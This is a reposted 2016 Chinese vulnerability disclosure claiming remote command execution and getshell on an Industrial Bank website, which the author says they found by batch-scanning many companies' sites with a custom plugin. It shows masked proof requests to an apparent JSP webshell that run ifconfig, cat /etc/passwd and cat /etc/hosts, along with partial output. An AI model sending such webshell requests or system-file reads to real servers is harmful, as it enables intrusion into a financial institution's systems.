HanDs
NO.2

[7月漏洞公开] 金融安全之兴业银行某站命令导致getshell 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

论插件的重要性

写了一个插件,投tangscan已重复,自己写了个脚本遍历了很多大公司的网站,然后批量去测试该插件的命中率。刚好发现该银行有这个漏洞...

插件还在跑,等找到漏洞了继续提交吧

详细说明:

233.png





code 区域

mask 区域
1.http://**.**.**/  漏洞地址_
**********
2.http://**.**.**/1.jsppwd=023&i=ifconfig_
**********
*****et HWaddr 00:*****
***** Bcast:168.3.23.2*****
*****50:56ff:feaa:73*****
*****G MULTICAST MT*****
*****errors:0 dropped*****
*****rors:0 dropped:0 *****
*****s:0 txqueu*****
*****3 GiB) TX bytes:2*****
**********
*****cap:Local*****
*****27.0.0.1 M*****
*****r: ::1/128*****
*****UNNING MTU:*****
*****rors:0 dropped:*****
*****rs:0 dropped:0 o*****
*****ons:0 txq*****
*****.3 MiB) TX byt*****
**********
**********
**********
3.http://**.**.**/1.jsppwd=023&i=cat%20/etc/passwd_
**********
*****:/root:/*****
*****bin:/sbi*****
*****:/sbin:/sb*****
*****r/adm:/sb*****
*****ool/lpd:/s*****
*****:/sbin:/*****
*****wn:/sbin:/s*****
*****:/sbin:/*****
*****/spool/mail*****
*****spool/uucp:/*****
*****tor:/root:/*****
*****/usr/games:*****
*****var/gopher:/*****
*****/var/ftp:/s*****
*****body:/:/s*****
*****sage bus:/:/*****
*****muxd user:/*****
*****memory owner:/d*****
*****/var/cache/rpc*****
*****eKit:/proc:/*****
*****Stack:/var/lib/avah*****
*****c/abrt:/sb*****
***** daemon:/:/*****
***** User:/var/lib*****
***** NFS User:/var/li*****
*****ib/gdm:/sb*****
*****/ntp:/sbi*****
*****:/var/www:/*****
*****r":/var/empty/*****
*****pool/postfix*****
*****ver:/var/lib*****
***** Daemon:/var/run/*****
*****t:/home/xgu*****
*****r:/home/sabayo*****
*****d SSH:/var/empty*****
*****::/:/sbi*****
*****be used by OProfile:/*****
*****ome/dev:/*****
*****home/zabbi*****
*****/ucp/cib*****
**********
**********
**********
4.http://**.**.**/1.jsppwd=023&i=cat%20/etc/hosts_
**********
*****domain localhost4 l*****
*****domain localhost6 l*****
*****9 name*****
*****0 data*****
*****5 UCP-*****
**********
*****ATALK UAT-*****
*****5 UAT*****
*****9 UAT*****

漏洞证明:

修复方案:

补丁


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
金融
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组